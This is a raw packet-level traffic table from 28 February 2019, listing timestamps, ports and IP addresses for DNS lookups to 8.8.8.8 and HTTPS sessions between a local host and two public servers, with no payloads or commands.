Feb 28, 2019 14:45:32.545705080 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.545727015 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.545748949 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.545769930 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.545780897 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.545793056 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.545815945 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.545839071 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.545861959 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.545883894 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.545906067 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.545908928 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.545928955 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.545952082 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.545974016 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.545996904 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.546005011 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.546020031 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.546042919 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.546065092 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.546087980 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.546109915 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.546118975 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.546132088 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.546154976 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.546178102 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.546200037 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.546225071 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.546243906 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.546283007 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.805453062 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.805589914 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:37.062233925 CET	49810	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:45:37.078453064 CET	53	49810	8.8.8.8	192.168.1.16
Feb 28, 2019 14:45:37.079848051 CET	49226	443	192.168.1.16	216.239.34.21
Feb 28, 2019 14:45:37.091965914 CET	443	49226	216.239.34.21	192.168.1.16
Feb 28, 2019 14:45:37.092052937 CET	49226	443	192.168.1.16	216.239.34.21
Feb 28, 2019 14:45:37.092694044 CET	49226	443	192.168.1.16	216.239.34.21
Feb 28, 2019 14:45:37.104526997 CET	443	49226	216.239.34.21	192.168.1.16
Feb 28, 2019 14:45:37.120995045 CET	443	49226	216.239.34.21	192.168.1.16
Feb 28, 2019 14:45:37.121045113 CET	443	49226	216.239.34.21	192.168.1.16
Feb 28, 2019 14:45:37.121226072 CET	49226	443	192.168.1.16	216.239.34.21
Feb 28, 2019 14:45:37.121712923 CET	443	49226	216.239.34.21	192.168.1.16
Feb 28, 2019 14:45:37.142011881 CET	49226	443	192.168.1.16	216.239.34.21
Feb 28, 2019 14:45:37.167959929 CET	443	49226	216.239.34.21	192.168.1.16
Feb 28, 2019 14:45:37.307703972 CET	55151	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:45:37.319794893 CET	53	55151	8.8.8.8	192.168.1.16
Feb 28, 2019 14:45:37.360723972 CET	53216	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:45:37.381062984 CET	49226	443	192.168.1.16	216.239.34.21
Feb 28, 2019 14:45:37.382796049 CET	443	49226	216.239.34.21	192.168.1.16
Feb 28, 2019 14:45:37.382966042 CET	49226	443	192.168.1.16	216.239.34.21
Feb 28, 2019 14:45:37.387768030 CET	53	53216	8.8.8.8	192.168.1.16
Feb 28, 2019 14:45:38.089452028 CET	49792	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:45:38.237248898 CET	53	49792	8.8.8.8	192.168.1.16
Feb 28, 2019 14:45:38.248636007 CET	50672	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:45:38.260689020 CET	53	50672	8.8.8.8	192.168.1.16
Feb 28, 2019 14:45:39.333594084 CET	49226	443	192.168.1.16	216.239.34.21
Feb 28, 2019 14:45:39.385310888 CET	443	49226	216.239.34.21	192.168.1.16
Feb 28, 2019 14:45:39.466412067 CET	443	49226	216.239.34.21	192.168.1.16
Feb 28, 2019 14:45:39.662431002 CET	49226	443	192.168.1.16	216.239.34.21
Feb 28, 2019 14:45:39.943768024 CET	49224	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:39.944371939 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:39.944933891 CET	49226	443	192.168.1.16	216.239.34.21
Feb 28, 2019 14:46:09.605091095 CET	54414	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:46:09.636219025 CET	53	54414	8.8.8.8	192.168.1.16
Feb 28, 2019 14:46:09.649728060 CET	61734	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:46:09.681889057 CET	53	61734	8.8.8.8	192.168.1.16
Feb 28, 2019 14:46:09.682384014 CET	49229	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:09.708609104 CET	443	49229	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:09.708746910 CET	49229	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:09.718996048 CET	49230	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:09.745090008 CET	443	49230	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:09.745270014 CET	49230	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:09.779871941 CET	49230	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:09.780292034 CET	49229	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:09.805939913 CET	443	49230	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:09.806333065 CET	443	49229	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:09.807823896 CET	443	49230	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:09.807852983 CET	443	49230	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:09.807869911 CET	443	49230	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:09.807889938 CET	443	49229	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:09.807909966 CET	443	49229	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:09.807926893 CET	443	49229	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:09.807985067 CET	49230	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:09.816349030 CET	49229	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:09.825843096 CET	49230	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:09.845608950 CET	49229	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:09.852459908 CET	443	49230	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:09.872361898 CET	443	49229	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:10.131304979 CET	49230	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:10.131371021 CET	49229	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:10.140295982 CET	443	49230	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:10.140419006 CET	49230	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.013078928 CET	49230	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.013817072 CET	49229	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.041302919 CET	443	49229	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.042176008 CET	443	49230	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.052043915 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.060796976 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.078311920 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.078406096 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.079006910 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.087044001 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.087135077 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.087831974 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.105099916 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.106086016 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.114080906 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.114944935 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.217308998 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.236902952 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.240767956 CET	49229	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.240849018 CET	49230	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.245407104 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.245465040 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.245474100 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.245505095 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.245531082 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.245532990 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.245558977 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.245587111 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.245615959 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.245639086 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.245666027 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.245712042 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.263586998 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.263622999 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.263643980 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.263667107 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.263689041 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.263703108 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.263706923 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.263731003 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.263755083 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.263777018 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.263804913 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.263988972 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.264146090 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.271722078 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.271737099 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.271764040 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.271785975 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.271809101 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.271831036 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.271836996 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.271853924 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.271877050 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.271907091 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.271929979 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.271953106 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.271961927 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.271975994 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.271998882 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.272017956 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.272039890 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.272062063 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.272084951 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.272119999 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.272121906 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.272563934 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.272723913 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.273252964 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.274266005 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.290055037 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290076971 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290092945 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290107965 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290121078 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290137053 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290152073 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290168047 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290169954 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.290201902 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290219069 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290234089 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290250063 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290285110 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.290287971 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290303946 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290319920 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290364981 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290370941 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.290381908 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290397882 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290414095 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290426970 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.290462971 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.290595055 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.290919065 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.298254967 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298290014 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298310995 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298331976 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298353910 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298371077 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.298373938 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298396111 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298415899 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298438072 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298458099 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298479080 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298496008 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.298499107 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298521042 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298542023 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298562050 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298583031 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298589945 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.298603058 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298624039 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298649073 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298669100 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298690081 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298695087 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.298711061 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298732042 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298752069 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298772097 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298772097 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.298794031 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298814058 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298834085 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298851967 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298870087 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298890114 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298907995 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298914909 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.298926115 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298947096 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298975945 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.298996925 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.299025059 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.299246073 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.299271107 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.299319983 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.299422979 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.299726009 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.316467047 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316518068 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316584110 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316648006 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316672087 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316688061 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316687107 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.316704035 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316728115 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316742897 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316759109 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316773891 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316788912 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316803932 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316818953 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316828012 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.316833973 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316849947 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316864967 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316878080 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316899061 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316925049 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316951036 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.316965103 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.316986084 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317001104 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317017078 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317033052 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317045927 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317059040 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317070961 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317084074 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317096949 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317111969 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317126036 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317141056 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317153931 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.317162991 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317178011 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317186117 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317195892 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317202091 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317209005 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317223072 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.317297935 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.318073034 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.325088024 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325109005 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325124025 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325139999 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325155020 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325161934 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.325169086 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325190067 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325206041 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325221062 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325236082 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325252056 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325284004 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325299978 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325321913 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.325330019 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325346947 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325361967 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325376987 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325402975 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325418949 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325439930 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.325450897 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325467110 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325515032 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325536013 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325552940 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325581074 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325617075 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325647116 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325665951 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325689077 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325711012 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325721979 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.325747967 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325757980 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325767040 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325788021 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325810909 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325833082 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325843096 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.325855970 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325877905 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325880051 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.325900078 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325923920 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.325995922 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.326081991 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.326098919 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.326116085 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.326128006 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.326143980 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.326145887 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.326159954 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.326174974 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.326188087 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.326201916 CET	443	49231	151.101.36.193	192.168.1.16
